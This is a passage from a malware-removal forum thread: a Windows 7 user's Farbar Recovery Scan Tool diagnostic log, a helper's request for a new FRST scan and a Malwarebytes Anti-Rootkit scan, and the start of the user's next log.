Ran by Ryan at 2014-11-07 17:46:56
Running from C:\Users\Ryan\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.122 - Atheros)
Atheros WLAN Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 7.0 - Atheros)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cirrus Logic Audio (HKLM-x32\...\{3A69FD31-5EE7-42C9-918B-81C07AA21043}) (Version: 10.14.0.0 - Cirrus Logic)
Cirrus Logic Audio x64 (Version: 7.25.38.0 - Cirrus Logic) Hidden
Common Desktop Agent (Version: 1.62.0 - OEM) Hidden
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Garmin ANT Agent (HKLM\...\{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GIMP 2.8.2 (HKLM\...\GIMP-2_is1) (Version: 2.8.2 - The GIMP Team)
Google Talk Plugin (HKLM-x32\...\{95763F66-297E-30CE-9728-6D0F20BF97F5}) (Version: 5.38.5.0 - Google)
GoToMeeting 5.3.0.1009 (HKCU\...\GoToMeeting) (Version: 5.3.0.1009 - CitrixOnline)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36279 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.10.1464 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2752 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
NVIDIA Graphics Driver 296.28 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.28 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)
Perfect Photo Suite 7.0.1 (HKLM-x32\...\{6727F16E-6BF0-4E73-AC73-958A382AA09E}) (Version: 7.0.1 - onOne Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.3000 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30130 - Realtek Semiconductor Corp.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.21.00(2/3/2014) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.60.40.03 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
SES Driver (HKLM\...\{D8CC254C-C671-4664-9A38-FA368D1E2C97}) (Version: 1.0.0 - Western Digital)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.10.1 - Tweaking.com)
USB3Setup (HKLM-x32\...\{4814105D-5756-4CD7-9430-ADA474A3E192}) (Version: 1.0.4.220 - VIZIO)
VIZIO Wireless Driver (HKLM-x32\...\{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}) (Version: 1.00.0001 - VIZIO)
VIZIO Wireless Touchpad (HKLM-x32\...\{3F0E78CA-735E-446D-8E60-69C6CA27EC95}) (Version: 1.00.0001 - VIZIO)
VIZIO_FN_Key_Utility (HKLM-x32\...\{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}) (Version: 1.3.15 - VIZIO)
VIZIOUtility version 1.0 (HKLM-x32\...\{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1) (Version: 1.0 - VIZIO)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2) (HKLM\...\24DA573F901348FFDFF7717497830D45BE0C362E) (Version: 07/07/2009 1.12.2 - Dynastream Innovations)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0) (HKLM\...\4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20) (Version: 01/19/2011 1.0.0009.0 - Western Digital Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zune (HKLM\...\Zune) (Version: 04.07.1404.01 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1009\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
==================== Restore Points =========================
02-11-2014 03:30:39 End of disinfection
03-11-2014 22:05:12 Windows Update
07-11-2014 02:21:37 Windows Update
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2014-11-03 15:18 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {372C798C-A5B3-4AA4-BBF2-B7E73240D486} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {503D3F2D-3467-4AD0-AB8F-6DC6CC77FC61} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {795C9DD4-84DD-4612-B8E5-6C26954A7C70} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {7A4BB95A-5FCC-432C-90F8-E7E4AB110F1C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {C5E1112F-43F2-4BEE-99A2-79ADA35DF515} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {F741AF84-829D-46EF-8DB7-4841CBC7DCCE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
==================== Loaded Modules (whitelisted) =============
2011-04-25 10:24 - 2011-04-25 10:24 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2012-04-27 17:43 - 2012-03-19 17:09 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-03-09 08:58 - 2012-03-09 08:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2012-03-09 08:58 - 2012-03-09 08:58 - 00057208 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2012-04-17 11:20 - 2012-04-17 11:20 - 00293376 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\vCapture64.dll
2012-03-28 13:15 - 2012-03-28 13:15 - 00013824 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\WMI_DLL64.dll
2012-04-27 17:03 - 2012-03-28 09:36 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 13:16 - 2014-01-20 13:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 18:30 - 2012-05-03 16:56 - 00089600 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
2012-05-18 18:30 - 2012-05-03 11:48 - 00093696 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
2012-05-18 18:30 - 2012-04-20 18:11 - 00034816 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
2012-05-18 18:30 - 2012-03-15 12:19 - 00241664 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
2012-04-27 17:03 - 2012-03-28 09:18 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\Windows:nlsPreferences
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-1987813687-3303645166-2786259458-500 - Administrator - Disabled)
Guest (S-1-5-21-1987813687-3303645166-2786259458-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1987813687-3303645166-2786259458-1003 - Limited - Enabled)
Ryan (S-1-5-21-1987813687-3303645166-2786259458-1001 - Administrator - Enabled) => C:\Users\Ryan
UpdatusUser (S-1-5-21-1987813687-3303645166-2786259458-1000 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 04:11:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (11/05/2014 05:41:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
System errors:
=============
Error: (11/07/2014 03:53:51 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/07/2014 01:39:10 AM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/06/2014 09:11:04 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/06/2014 04:11:26 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/05/2014 05:40:52 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 10:19:29 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 03:29:58 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 03:24:36 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 00:41:25 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/03/2014 09:32:20 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Microsoft Office Sessions:
=========================
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 04:11:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
Error: (11/05/2014 05:41:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
CodeIntegrity Errors:
===================================
Date: 2014-11-03 15:18:28.899
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-11-03 15:18:28.884
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 23%
Total physical RAM: 8085.95 MB
Available physical RAM: 6189.41 MB
Total Pagefile: 16170.07 MB
Available Pagefile: 13611.34 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:919.21 GB) (Free:829.67 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 868B7EFA)
Partition 1: (Active) - (Size=600 MB) - (Type=27)
Partition 2: (Not Active) - (Size=919.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=27)
==================== End Of Log ============================
Good
What TDSSKiller alerted us to were unsigned files but to legitimate applications.
Sorry you had to make multiple post but I knew the logs would be long.
OK, what to do next.
I would like to see a new FRST log including the Addition.txt.
Run FRST
Don´t change the checkboxes just click on Scan.
https://dl.dropboxusercontent.com/u/73555776/frst.JPG
Ensure there is a check mark for Addition.txt
Logfiles are created on your desktop.
Post the FRST.txt
- Please also paste that along with the FRST.txt into your reply.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Please do the above and also include
Please download Malwarebytes Anti-Rootkit (http://www.malwarebytes.org/products/mbar/) and save it to your desktop.
Be sure to print out and follow the instructions provided on that same page for performing a scan.
Caution: This is a beta version so also read the disclaimer and back up (http://support.microsoft.com/kb/971759) all your data before using.
When the scan completes, click on the Cleanup button to remove any threats found and reboot the computer if prompted to do so.
Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click Cleanup once more and repeat the process.
If there are problems with Internet access, Windows Update, Windows Firewall or other system issues, run the fixdamage tool located in the folder Malwarebytes Anti-Rootkit was run from and reboot your computer.
Two files (mbar-log-YYYY-MM-DD, system-log.txt) will be created and saved within that same folder.
Copy and paste the contents of these two log files in your next reply.Note: Further documentation can be found in the ReadMe.rtf file which is located in the Malwarebytes Anti-Rootkit folder.
Please do the above and also include
Please download Malwarebytes Anti-Rootkit (http://www.malwarebytes.org/products/mbar/) and save it to your desktop.
Be sure to print out and follow the instructions provided on that same page for performing a scan.
Caution: This is a beta version so also read the disclaimer and back up (http://support.microsoft.com/kb/971759) all your data before using.
When the scan completes, click on the Cleanup button to remove any threats found and reboot the computer if prompted to do so.
Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click Cleanup once more and repeat the process.
If there are problems with Internet access, Windows Update, Windows Firewall or other system issues, run the fixdamage tool located in the folder Malwarebytes Anti-Rootkit was run from and reboot your computer.
Two files (mbar-log-YYYY-MM-DD, system-log.txt) will be created and saved within that same folder.
Copy and paste the contents of these two log files in your next reply.Note: Further documentation can be found in the ReadMe.rtf file which is located in the Malwarebytes Anti-Rootkit folder.
Should I go ahead and run the OTL tool you recommended a few posts back but I never ran?
Let me see the above logs first.
ascot1340
2014-11-08, 01:43
I've pasted the FRST and Malwarebytes Anti-Rootkit logs below. The Malwarebytes Anti-Rootkit didn't detect any threats so there was no cleanup.
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Ryan (administrator) on RYAN-PC on 07-11-2014 18:13:48
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
